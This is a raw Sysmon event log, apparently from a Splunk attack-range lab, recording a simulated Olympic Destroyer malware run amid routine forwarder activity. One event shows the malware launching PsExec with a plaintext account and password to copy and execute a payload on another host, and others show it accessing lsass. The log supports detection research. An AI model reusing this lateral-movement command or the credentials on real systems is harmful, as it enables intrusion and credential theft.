Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:52.361{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46F945A5A6246EB055854CB5DB435FC2,SHA256=DB0300E6D1117A0FD76CE7765B806D135B650CF35E99438378FCED07371C7CB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:52.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFCFB30307DDDE54113168903E25B0E5,SHA256=8CD8D9EF22D5FE29B9199D441823F5540F5F21CBBF24D406F9972F1229979B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:52.332{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-157MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:52.267{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B7FEFF434A0980CF22A05332D702149,SHA256=A2F6E9B6AABB69DA3741752463037F3C2BB220529457EA66ADCD1757B6DFC49E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000221101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:14:53.736{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a6-0x9506de9d) 354300x8000000000000000221100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.547{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51625-false10.0.1.12-8000- 23542300x8000000000000000221099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:53.595{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B39C72A3A196F59A66422F4E29C3A7,SHA256=95AC9D4709CD0A7CECD066C76E993C8468E84FE3FB3E421D56801CC7489FBF1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:53.604{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E80528E9725A9DEFC8691B12798B5AD,SHA256=217E03319E9C92E7CF9683F43FADD17B0FF5AD023417A98872AF475836221B10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:53.399{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:53.398{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:53.398{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:53.337{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-158MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:50.672{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49425-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:54.627{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AD0F2882F7EB7D65D41549507DC5A1D,SHA256=D48C4082C6307591DD154786357FE483F4DEC837EAD440C255BA241FA6B12EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:54.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=122949860D965C38DF935195A02F63D1,SHA256=48D873ADF88A25025A75A1C1F7DAA40EE754831CA27E811C08EBAB12AAE533C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:55.659{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19625BC8FEF38FA2193D99245B37053C,SHA256=478A3CD724CE7FB6BF2A317C24326897D75E522BF5DC2C60C6C32F4E547B2670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:55.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33898F5B189AE7E35A7953B1E68CA7FA,SHA256=013C55EF14EB2CCBD3597966866843473258C5D65BA92C811FFF6F1533DA085C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:56.700{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5306734DEDEAAA94114D61B8AFA692AA,SHA256=A864A2DABF9D9B941620D5017560418722DE26B59F324BDBE0DD8339FD841051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:56.705{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC1385502F1779C3158E630A4BF58DC0,SHA256=9733F6EBD42AF48FF963BE6BCEC71CC824288EBB2AA7E26132CB5457EF0DCE7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:57.705{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03F41318DB3FCC473791EE76ACC31A9B,SHA256=6BD7E7A7BB2CBFDFCA5335EF353EBCF715792AFA0304AE8844897FDAF0115B13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:57.732{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A93CEC1255E46CF43F0292E184FCACDC,SHA256=15C46DB66126DCC2FE7192FF1ECE58A4A73E4380E55B97FDCB6EFEE97E87863E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:58.721{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD8D7CDF9A4EF16EFC32E21A8A4B5C1E,SHA256=3BC12371FAC05A0903C31DBD461C30872B0C58C2B3215DBE7367100BBB69F67D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.849{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000297177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.842{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000297176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000297175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.833{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000297174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:58.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B080C00AC8088E7C7CEEF5741F0484A,SHA256=D4C7FF6BB33A71D1C7A7A679BEE1F075E89D185A502C406932A5EEE9D2D37A48,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:56.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49427-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:59.737{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFC0148B43C83629712F61F1DAE4D74C,SHA256=57ADDCD94F232492380E5F064BB0CC0AFD200AB2E45072886FC426FCBCFC11A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40356BD4F83AB000AA209C2719CC5889,SHA256=93CBCDE61E360852802A69574F5520F56948067A7016D8C196CB14C5C7DE199B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.180{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.180{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000297189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:14:59.165{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000297188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:59.080{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1732-6216-2007-000000003802}6724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 